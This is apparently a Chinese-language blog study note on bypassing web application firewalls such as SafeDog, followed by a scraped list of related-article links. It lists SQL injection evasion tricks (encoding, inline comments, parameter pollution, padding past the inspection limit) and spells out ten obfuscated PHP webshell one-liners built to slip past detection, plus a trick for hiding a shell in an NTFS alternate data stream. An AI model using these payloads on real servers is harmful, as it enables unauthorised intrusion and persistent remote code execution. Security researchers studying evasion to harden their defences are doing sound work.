bypass绕WAF
注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!
WAF:
web应用防护系统(网站应用级防御系统)
waf会拦截恶意传参,但并不是所有的拦截都是waf干的
硬件waf、软件waf、云waf
WAF检测机制的核心就是正则表达式
测试环境
系统:win2008R2
最新版安全狗:
一、常见绕WAF手法
Bypass SQL
1、大小写绕过(很老的waf才有用)
2、替换绕过
3、特殊字符绕过(%0a换行) \sleep() \updataxml()
4、编码绕过(利用检测机制的不同,通过编码绕过)
5、等价替换(利用其他函数替换
注释 /**/ 数据库中是注释的意思
内联注释 /*!5001*/ 当数据库版本大于5001执行
6、容器特征(apche的hpp、或者是iis的%分割)
iis传参里面 s%e%l%e%c%t => select
apche参数污染,传两个参数,以后一个参数为准
id=phpinfo() /*&id=1 and 1=2-- qwe*/
7、白名单(管理员权限或者是127.0.0.1本地不拦截、文件后缀名)
8、缓冲区(数据太多超过waf检测范围)
安全狗一般检测4000个
?id= 1 /* ...... */ union select 1,2,3,4
二、绕WAF写码
Bypass webshell
1、<?php eval($_REQUEST[8]);?> 非常的难以置信,这个竟然没有拦截
2、<?php eval(end($_REQUEST));?>
3、<?php define("a","$_REQUEST");eval(a)?>
4、变量覆盖绕过
<?php $a="ev"; $b="al"; $c=$a$b; $d="c";
$$d($_REQUEST[8]); ?>
5、函数绕过
<?php funcation a($a,$b){return $a.$b;} eval(a("$_REQ","UEST")[8])?>
6、魔术方法绕过
<?php class User{public $name;public function __destruct(){ eval("$this->name"); } }$user = new User(); $user->name="$_REQUEST[8]";
?>
7、类方法绕过
<?php $COOKIE=$_COOKIE;
foreach($COOKIE as $key=> $value){
if($key=='eval'){
$key($REQUEST[8])
}
}?>
8、内置函数
<?php
$a=get_defined_functions();
$a[internal][841]($_REQUEST[1])
?>
9、绕WAF终极手法,连接外部数据库hjw,获取info表中的第一行数据eval($_REQUEST[8])
<?php
eval(mysqli_fetch_assoc(mysqli_query(mysql_connect('127.0.0.1','root','root','hjw123'),'select * from info'))['info']) //键为info的地方
?>
10、拿到shell之后藏shell的妙招ntf文件流
一、echo "<?php eval($_REQUEST[8])?>" >> /:123.txt
二、<?php include('/:123.txt')?>
bypass绕WAF相关推荐
- 如何跟踪log4j漏洞原理及发现绕WAF的tips
log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips 跟进漏洞产生原因的思路 如何发现漏洞产生原因的 了解到log4j ...
- 43_sql注入绕waf
sql注入绕waf 一.搭建安全狗 参考文章 https://www.cnblogs.com/zhaoyunxiang/archive/2021/09/27/15342257.html 搭建之后,通过 ...
- Java文件上传大杀器-绕waf(针对commons-fileupload组件)
Java文件上传大杀器-绕waf(针对commons-fileupload组件) Ps:高版本才有1.3以上 来个中二的标题,哈哈哈,灵感来源于昨晚赛博群有个师傅@我是killer发了篇新文章,在那篇 ...
- 一句话木马绕WAF(小宇特详解)
webshell绕过WAF 常见的PHP一句话木马就是 <?php eval($_REQUEST['a'];)?> WAF的工作原理以正则匹配为主,这里尝试他到底是正则匹配了什么 这里首先 ...
- WAF自动化Fuzz工具-WAFNinja(绕WAF、绕过WAF)
目录 前言 简介 下载安装 下载方式: 安装 使用 查看帮助信息 使用示例 参数介绍 前言 在我们平时做渗透测试的时候,难免会遇到各种WAF的阻挡.这时一款良好的绕过WAF的渗透测试工具就显得很受渗透 ...
- tamper绕WAF小结
sqlmap有一些非常好的脚本,在如下的地址中你能够发现它们.使用svn检查 https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev 事实上,脚本的 ...
- salmap绕waf
2019独角兽企业重金招聘Python工程师标准>>> 0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入 ...
- 唯快不破的分块传输绕WAF
某重保项目,需要进行渗透,找到突破口,拿起sqlmap一顿梭,奈何安全设备在疯狂运转,故祭起绕过注入的最强套路-分块传输绕过WAF进行SQL注入.安全人员当然安全第一,拿到渗透授权书,测试时间报备等操 ...
- 记录一次Oracle注入绕waf
这个注入挺特殊的,是ip头注入.我们进行简单的探测: 首先正常发起一次请求,我们发现content-type是76 探测注入我习惯性的一个单引号: 一个单引号我发现长度还是76 我开始尝试单引号,双引 ...
最新文章
- 手撕代码之七大常用排序算法 | 附完整代码
- 自动化测试现状趋势解读,附带近年自动化测试常用工具
- 基于Hash算法的高维数据的最近邻检索
- 移动端应用类型及特点
- torch yolov3梯度发散
- 「镁客早报」任正非称对苹果等对手出售5G芯片持开放态度;马斯克称未来12个月内将生产超过50万辆车...
- 数学图形(1.42)拱形曲线
- c++ 线程什么时候run_阿里后端Java面试题:启动线程是start()还是run()?为什么?...
- 脚本启动显示查询频繁被服务器防御_面对CC攻击,该如何进行防御
- 计算机硬盘修复教程,DiskGenius数据恢复教程 教你电脑硬盘数据如何恢复
- bzoj 1664 (贪心)
- zabbix 监控项-计算公式监控磁盘使用率
- c语言岩石1ms,2017年注册岩土工程师基础考试真题下午和答案解析
- Manjaro Linux安装QQ和微信
- phpcms 下载数统计
- UE4虚幻引擎4多人联机基础知识和客户端服务器通信机制详解
- AVL树【图示详解+代码实现】
- 使用html2canvas保存html或者div内容为图片及自定义名称
- 用脉冲响应不变法设计IIR 滤波器 MATLAB实现
- JS中的各种遍历方法
热门文章
- HQChart使用教程67 - 鼠标点击K线柱子监听事件
- 【GK101 谐波数据生成器】上位机软件升级(版本:1.1)
- [原创]水知道答案吗?(一)
- 读丘维声之《解析几何》
- 如何防止ajax站外提交,ajax 防止用户反复提交的2种解决方案
- “running install error: can‘t create or remove files in install directory The following error occu”
- C++自增操作符你真的懂?
- Vulkan Samples 阅读 -- Extensions(二)
- 基于ESP8266上云实验
- PTA 2-1 旅游规划(最短路径问题)简单floyd算法